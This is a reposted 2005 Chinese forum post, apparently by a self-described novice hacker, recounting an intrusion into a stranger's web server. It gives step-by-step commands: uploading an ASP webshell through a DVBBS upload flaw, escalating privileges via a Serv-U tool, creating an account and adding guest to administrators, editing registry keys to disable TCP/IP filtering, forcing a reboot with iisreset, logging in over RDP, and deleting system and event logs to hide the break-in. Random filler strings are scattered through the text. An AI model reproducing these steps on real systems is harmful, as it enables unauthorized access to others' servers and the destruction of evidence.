数学建模社区-数学中国

标题: 从建立用户到3389登陆 [打印本页]

作者: 韩冰    时间: 2005-1-23 13:50
标题: 从建立用户到3389登陆

作者:晓菲 来自:http://www.wrsky.com/

- n5 c! c) X0 T; M

本人技术比较菜,希望各位高手看了后不要笑话。。

9 N$ ^& F! V. R' q

今天下午在上网,一个QQ号接到某些人用那个QQ发言软件发来的消息,反正就是广告好了,但是也没太黄,或者太难听,就是宣传自己的主页的,一般碰到这样的情况我都爱理不理,正好看到他和我是一个地方的,我们这小山钩钩还有人会在网上发布消息,真晕哦。不行,得去看一看,我没有直接打开,(我也怕里面有网页木马),好吧,用明小子的Domain,就是那个旁注工具,一般我都喜欢先看一下,扫到一个upfile.asp,是DVBBS,很容易的上传一个马,好了,进入,我使用的是冰点的2005.asp和火狐专用版4.asp,(其实我还是比较喜欢用老兵的木马,但是不知道什么原因不能用了,555,技术菜真汗。~~~)好了,废话不说了,开工。 8 u7 p. h- B6 N我主要介绍一下建立管理员的过程,好,先看看能打开别的盘不能,& d; Z' x3 b/ V5 j9 z- U4 G 哇,这个服务器很好,可以浏览整个服务器里硬盘里的所有数据,而且还可以写入 N& z, ?7 y l使用一下net user8 p4 U6 m ~, Y! c 返回的提示信息显示,只有默认的几个帐户,嘿, / f( Q4 Z. t) X; E6 A在试一下. {) W8 m; i7 ?& i' S net user xiaofei xiaofei /add ps:建立一个xiaofei的用户名密码也是xiaofei( v5 R. r& e; h: U5 `: e- ` k1 I ASP木马没有显示,哎看来不行,我还没有试过直接可以用ASP木马建立用户名的服务器呢,(其实以前也没有成功过)" @% [2 X4 U4 a, A1 u9 v9 o 哎那就在换别的方法: Z6 Z( l( @2 [1 D9 J3 ^9 N 好的,看他用PCANYWHERE了吗,一般使用这个作为网站管理的比较多。6 ^5 d# J }- w ] 找一下他的默认目录: 6 M, ?# U* `3 u2 a3 L5 {3 }9 e- eC:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 5 x0 J( V2 k% y+ g9 D 哎,这个服务器也没有装,难道没有方法建立用户名了吗? * @, H7 C% s5 |+ d$ x3 I在找找,在D盘里看到了SERU,忘记看版本了,想到可以用工具提权,就糊里糊涂的上传了一个工具上去,找了一个ftp.exe,ok,然后 6 h$ B) `3 G Z: |& Y& o% `0 Z3 zD:ftp.exe "net user xiaofei xiaofei /add"" E4 c1 l7 C* A/ s) F$ q8 R" d4 l 提示一大堆返回信息什么的,然后使用了一下net user 看到xiaofei这个用户名了,就是成功了。4 y9 B8 x- ]2 M g D:ftp.exe "net user xiaofei xiaofei /add" # A) z- P" K7 P1 d( a' R继续提权,在继续输入 / r, Q5 v3 D8 P) X& WD:ftp.exe "net localgroup administrators guest /add“& A/ d+ [3 W, n4 D 又成功,然后执行了一下netstat -an 看了一下,ok,3389已经开放了,不用在麻烦我去开3389了,ok,找3389终端登陆,go。 . m3 w2 m5 h3 \3 j$ n+ J7 F% U打开终端了,但是连不上,晕忽忽。哭哟,用户名都建好了,还连不上主机,在翻了一下目录,也没看到有防火墙,使用ipconfig -all,也没有和内网连接的迹象呀,郁闷ing,不知道怎么办了。正好在冰点极限论坛看到了一篇文章,“从上传webshell到突破TCP/IP筛选到3389终端登陆”(我在下面的回帖中会放上这个帖子,帖子中有详细的介绍)其实这样的文章好多,平时其实没怎么注意的,正好现在被我看到了,哈哈运气好,希望明天买彩票也能中个500W就好了。ok。其实是服务器做了TCP,IP筛选,3389端口可能只能让某一段IP进行访问,那好吧,我们就把他删掉。/ c7 V) |" \8 Q: f D:\ftp.exe "regedit -e D:\.1reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第一处 - d" Y- \. p, N7 l! I/ aD:\ftp.exe "regedit -e D:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第i二处! s6 @$ a1 ~5 G/ \" q D:\ftp.exe "regedit -e D:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" 导出注册表里关于TCP/IP筛选的第三处- f, \; A$ S3 q; N) k: n$ z3 W 然后下载到自己的PC里,使用记事本编辑,然后ctrl+F搜索EnableSecurityFilters"=dword:00000001这个参数,把它改成EnableSecurityFilters"=dword:00000000。 把1.reg,2.reg,3.reg都改过来,然后上传回服务器路径中,我又上传到了D盘里,~好了,我们要把刚才编辑的1,2,3都导入注册表中。 7 @8 O' q1 S. U5 ~5 UD:\ftp.exe "regedit -s D:\1.reg" 直接将1.reg导入到注册表1 g) M. {) M/ u2 s/ @6 h' @: [9 X 另外两个也一样。6 p: v$ |5 P( P4 R 然后在执行 $ K. {4 U$ S9 y# a v& t# }D:\ftp.exe "iisreset /reboot /timeout:00" 利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动,也就是一小会,访问网站,已经访问不进去了,差不多几分钟后,可以访问了,直接登陆3389,输入我建立的用户名,ok了。我们的提权访问工作也做完了。最好也把日志清一下,做坏事了嘛,嘿嘿。下面是日志存放文件,在DOS下运行一下就ok了,不在需要用用别的工具咯。 # d5 E/ R! [9 x$ }7 ?+ xdel C:\winnt\system32\logfiles\*.* % \ |1 @9 q' W( A del C:\winnt\ssytem32\config\*.evt ( m3 u2 J# q1 D" K0 v; e9 ]; G" odel C:\winnt\system32\dtclog\*.* / X: |; w0 l. c& l2 B. a del C:\winnt\system32\*.log ; q; P2 n* L2 I6 x: m" ^del C:\winnt\system32\*.txt ( C! N, S1 u2 C; o del C:\winnt\*.txt 0 V) `2 S$ ?5 M' j% l7 M; V del C:\winnt\*.log 5 F! e1 p4 m/ \1 \当然人家做个服务器也不容易,大家不要对国内的机器进行破坏哦。好了,找服务器的管理员的联系方法去了,如果你要是做违法的事,小心警察叔叔第二天来敲门哦。。。 ' M3 _) m. u/ t& F3 n本人只会使用一些别人编写好的程序进行对网站的攻击,但是对基本的原理还不太了解,来到火狐希望能和大家一起学习一些基础的知识,大家来一起学习吧。7 m3 \1 g. l) `4 H% A 本人在申请火狐论坛的认证会员,希望管理员看在打了这么多字的份上在多考虑一下拉,好好学习,天天向上。


作者: USER001    时间: 2005-1-23 14:21
好好学习……




欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5